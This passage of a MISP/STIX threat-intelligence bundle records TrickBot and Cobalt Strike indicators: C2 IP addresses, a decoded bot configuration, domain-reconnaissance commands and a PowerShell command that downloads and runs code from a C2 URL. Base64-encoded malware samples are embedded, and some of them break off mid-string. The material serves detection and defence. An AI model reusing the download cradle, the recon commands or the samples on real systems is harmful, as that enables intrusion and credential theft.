"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-f290-41ad-9ab3-461674656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '114.8.133.71' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-c434-4f05-9cc8-4f5574656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '119.252.165.75' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-b7d4-48c7-9f26-49e274656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '121.100.19.18' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-e7e4-4dba-b99d-4eb374656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '202.29.215.114' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-549c-470e-a6de-465f74656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '180.180.216.177' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-1278-4b1b-8bb6-40f874656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '171.100.142.238' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-c438-4004-88c9-495a74656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '186.232.91.240' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a5f2-9a68-4b61-b682-4f4674656a8a",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:27:50.000Z",
"modified": "2020-03-17T10:27:50.000Z",
"description": "On port 449",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '181.196.207.202' AND network-traffic:dst_port = '449']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:27:50Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst|port\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"kill-chain:Command and Control",
"trickbot"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a685-4150-4cad-be79-4eb70a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:29:43.000Z",
"modified": "2020-03-17T10:29:43.000Z",
"pattern": "[network-traffic:dst_ref.type = 'ipv4-addr' AND network-traffic:dst_ref.value = '66.42.99.79']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:29:43Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Network activity"
}
],
"labels": [
"misp:type=\"ip-dst\"",
"misp:category=\"Network activity\"",
"misp:to_ids=\"True\"",
"Cobalt Strike",
"kill-chain:Command and Control"
]
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e70a70a-34cc-4e93-9307-46120a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:32:21.000Z",
"modified": "2020-03-17T10:32:21.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Support Tool\""
],
"x_misp_category": "Support Tool",
"x_misp_comment": "decoded trickbot config using https://github.com/hasherezade/malware_analysis/tree/master/trickbot",
"x_misp_type": "text",
"x_misp_value": "./trick_settings_decoder.py --brute --file ~/Downloads/settings.ini\r\nSearching the charset...\r\n\r\n[+] Decoded with matching charset: HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o1246jMQDz7ETy\r\n\r\n<mcconf>\r\n<ver>1000503</ver>\r\n<gtag>tt0002</gtag>\r\n<servs>\r\n<srv>5.182.210.226:443</srv>\r\n<srv>192.210.226.106:443</srv>\r\n<srv>51.254.164.244:443</srv>\r\n<srv>45.148.120.153:443</srv>\r\n<srv>195.123.239.67:443</srv>\r\n<srv>194.5.250.150:443</srv>\r\n<srv>217.12.209.200:443</srv>\r\n<srv>185.99.2.221:443</srv>\r\n<srv>51.254.164.245:443</srv>\r\n<srv>185.62.188.159:443</srv>\r\n<srv>46.17.107.65:443</srv>\r\n<srv>185.20.185.76:443</srv>\r\n<srv>185.203.118.37:443</srv>\r\n<srv>146.185.253.178:443</srv>\r\n<srv>185.14.31.252:443</srv>\r\n<srv>185.99.2.115:443</srv>\r\n<srv>172.245.156.138:443</srv>\r\n<srv>51.89.73.158:443</srv>\r\n<srv>190.214.13.2:449</srv>\r\n<srv>181.140.173.186:449</srv>\r\n<srv>181.129.104.139:449</srv>\r\n<srv>181.113.28.146:449</srv>\r\n<srv>181.112.157.42:449</srv>\r\n<srv>170.84.78.224:449</srv>\r\n<srv>200.21.51.38:449</srv>\r\n<srv>46.174.235.36:449</srv>\r\n<srv>36.89.85.103:449</srv>\r\n<srv>181.129.134.18:449</srv>\r\n<srv>186.71.150.23:449</srv>\r\n<srv>131.161.253.190:449</srv>\r\n<srv>200.127.121.99:449</srv>\r\n<srv>114.8.133.71:449</srv>\r\n<srv>119.252.165.75:449</srv>\r\n<srv>121.100.19.18:449</srv>\r\n<srv>202.29.215.114:449</srv>\r\n<srv>180.180.216.177:449</srv>\r\n<srv>171.100.142.238:449</srv>\r\n<srv>186.232.91.240:449</srv>\r\n<srv>181.196.207.202:449</srv>\r\n</servs>\r\n<autorun>\r\n<module name=\"pwgrab\"/>\r\n</autorun>\r\n</mcconf>"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a89e-79d0-4f1c-a597-4cf50a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:38:41.000Z",
"modified": "2020-03-17T10:38:41.000Z",
"pattern": "[url:value = 'http://66.42.99.79:80/q']",
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:38:41Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "Payload delivery"
}
],
"labels": [
"misp:type=\"url\"",
"misp:category=\"Payload delivery\"",
"misp:to_ids=\"True\"",
"Cobalt Strike",
"kill-chain:Delivery"
]
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e70a908-11b4-4fcd-a31c-4b380a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:40:08.000Z",
"modified": "2020-03-17T10:40:08.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "%WINDIR%\\system32\\cmd.exe /C net group \"enterprise admins\" /domain"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e70a91c-ba40-44f8-a6a4-4b360a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:40:28.000Z",
"modified": "2020-03-17T10:40:28.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "%WINDIR%\\system32\\cmd.exe /C net group \"domain admins\" /domain"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e70a964-6484-4ac5-a73b-40b40a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:41:40.000Z",
"modified": "2020-03-17T10:41:40.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "%WINDIR%\\system32\\net1 config workstation"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e70a99c-07a4-4eae-8027-421b0a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:42:36.000Z",
"modified": "2020-03-17T10:42:36.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "%WINDIR%\\System32\\cmd.exe /c nltest /domain_trusts"
},
{
"type": "x-misp-attribute",
"spec_version": "2.1",
"id": "x-misp-attribute--5e70a9c8-27d8-4d27-a2c6-43b00a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:43:20.000Z",
"modified": "2020-03-17T10:43:20.000Z",
"labels": [
"misp:type=\"text\"",
"misp:category=\"Artifacts dropped\""
],
"x_misp_category": "Artifacts dropped",
"x_misp_type": "text",
"x_misp_value": "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://66.42.99.79:80/q'))\""
},
{
"type": "observed-data",
"spec_version": "2.1",
"id": "observed-data--5e70b073-671c-4c61-97c4-4ab90a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T11:11:47.000Z",
"modified": "2020-03-17T11:11:47.000Z",
"first_observed": "2020-03-17T11:11:47Z",
"last_observed": "2020-03-17T11:11:47Z",
"number_observed": 1,
"object_refs": [
"url--5e70b073-671c-4c61-97c4-4ab90a0a020f"
],
"labels": [
"misp:type=\"link\"",
"misp:category=\"External analysis\""
]
},
{
"type": "url",
"spec_version": "2.1",
"id": "url--5e70b073-671c-4c61-97c4-4ab90a0a020f",
"value": "https://laskowski-tech.com/2020/03/16/breakout-time-trickbot-edition/"
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a31f-5d70-41f2-9914-45110a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:28:29.000Z",
"modified": "2020-03-17T10:28:29.000Z",
"pattern": "[file:hashes.MD5 = '1853b48b655d5bd0a34791a93da8647c' AND file:hashes.SHA1 = 'bfb30a9a08612be1a772fba531cf885bb8cf48aa' AND file:hashes.SHA256 = '281651b91568f18d3aca7c28d4f1b0f5220673736afb41a00c268cac2355bfc3' AND file:name = 'VMMM.exe' AND file:size = '262144' AND (file:content_ref.payload_bin = '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
"pattern_type": "stix",
"pattern_version": "2.1",
"valid_from": "2020-03-17T10:28:29Z",
"kill_chain_phases": [
{
"kill_chain_name": "misp-category",
"phase_name": "file"
}
],
"labels": [
"misp:name=\"file\"",
"misp:meta-category=\"file\"",
"misp:to_ids=\"True\"",
"trickbot",
"kill-chain:Installation"
]
},
{
"type": "indicator",
"spec_version": "2.1",
"id": "indicator--5e70a382-87ec-4e10-a667-4bfa0a0a020f",
"created_by_ref": "identity--5e157d76-c92c-4acd-a54e-4a01950d210f",
"created": "2020-03-17T10:28:29.000Z",
"modified": "2020-03-17T10:28:29.000Z",
"pattern": "[file:hashes.MD5 = '05edcb0eb84c33833186465b81a7fe9c' AND file:hashes.SHA1 = '8e8c984943d0bcde75c7306f0d7f80afaa65e18e' AND file:hashes.SHA256 = 'f3bc96c4ae65ade028cd97d9b7ae0d82251c4af20ec4cbc4cd1ffefa5ac90eb2' AND file:name = '0gi7s88zgyl7qz9uwcwgcjigat_x2k3zrofs8xd_rfur2a61vxg28au9ha00n7pt.exe' AND file:size = '397312' AND (file:content_ref.payload_bin = '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